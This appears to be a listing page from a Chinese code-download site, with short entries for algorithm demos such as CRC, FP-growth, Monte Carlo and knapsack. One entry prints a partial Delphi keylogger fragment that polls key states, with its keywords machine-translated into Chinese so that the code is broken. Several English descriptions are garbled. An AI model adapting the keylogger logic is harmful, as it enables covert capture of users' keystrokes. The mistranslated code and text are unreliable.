-
Learnin Mathematics with the ABACUS Activity
Learnin Mathematics with the ABACUS Activity-book
part 6
- 2022-05-05 04:37:03下载
- 积分:1
-
银行家算法C++描述
银行家算法C++描述-bankers algorithm C Description
- 2022-06-19 09:14:25下载
- 积分:1
-
32 bits CRC算法演示,用户可以选择输入一个文件,本工具根据循环雍余校验算法,生成并显示出其32位计算结果。...
32 bits CRC算法演示,用户可以选择输入一个文件,本工具根据循环雍余校验算法,生成并显示出其32位计算结果。-32 bits CRC algorithm demonstration, a user could choose to import a document, the tools under the revolving Yong I checksum algorithm for generating and demonstrated its 32 results.
- 2022-06-18 05:24:02下载
- 积分:1
-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1
-
几百个数值算法
几百个数值算法-Hundreds of numerical algorithm
- 2023-02-19 20:55:03下载
- 积分:1
-
FP增长频繁项集挖掘
资源描述FP-growth算法是一个程序来发现频繁项集(关闭和最大以及发电机)与FP-growth算法(频繁模式增长[韩等。2000),表示事务数据库的前缀树,这是加强与链接,组织节点到列表中指同一项目。搜索是通过突出的前缀进行的树,递归地工作结果,并修剪原始树。实施还支持封闭和过滤最大项目集有条件项集库在[ 2003 ]格兰恩和朱,虽然在程序中使用的方法不同于它采用自顶向下的前缀树而不是FP树。它不包括FP树的巧妙的实现两个整数数组作为[ 2004 ] rasz建议。自版本与6上面所用的程序也可以用来查找关联规则。
- 2023-04-11 15:50:04下载
- 积分:1
-
MPEG —PS封装
一个关于MPEG-PS格式的封装,封装规则依照ISO_IEC_13818-1进行。封装后可用一般播放器播放,比如VLC,暴风影音等普通播放器播放。代码已经测试过可用。2个工程一个是打包的 一个是解包的。
- 2022-05-12 22:12:09下载
- 积分:1
-
Monte Carlo method known as random or statistical skills test method. More than...
蒙特卡罗方法又称随机抽样技巧或统计试验方法。半个多世纪以来,由于科学技术的发展和电子计算机的发明 ,这种方法作为一种独立的方法被提出来,并首先在核武器的试验与研制中得到了应用。蒙特卡罗方法是一种计算方法,但与一般数值计算方法有很大区别。它是以概率统计理论为基础的一种方法。由于蒙特卡罗方法能够比较逼真地描述事物的特点及物理实验过程,解决一些数值方法难以解决的问题,因而该方法的应用领域日趋广泛。
-Monte Carlo method known as random or statistical skills test method. More than half a century, the development of science and technology and the invention of the electronic computer, this method as an independent method was raised and the first nuclear test and research has been applied. The Monte Carlo method is a calculated, but with the general numerical method a great difference. It was based on the theory of probability and statistics-based approach. As the Monte Carlo method can vividly describe things and the physical characteristics of the experimental process, numerical methods to solve some difficult problems, the result of the increasingly extensive application areas.
- 2022-07-14 13:23:24下载
- 积分:1
-
实现集合的交和并集
实现集合的交和并集- The realization gathers junction with sum aggregate
- 2022-09-30 21:30:03下载
- 积分:1
-
C语言实现的0/1背包问题
主要用来解决0/1背包问题,实现的计算机语言是C语言,通过随机的产生物品的信息,通过此算法决定哪些物品放入背包中,哪些放弃。
- 2022-06-15 10:46:18下载
- 积分:1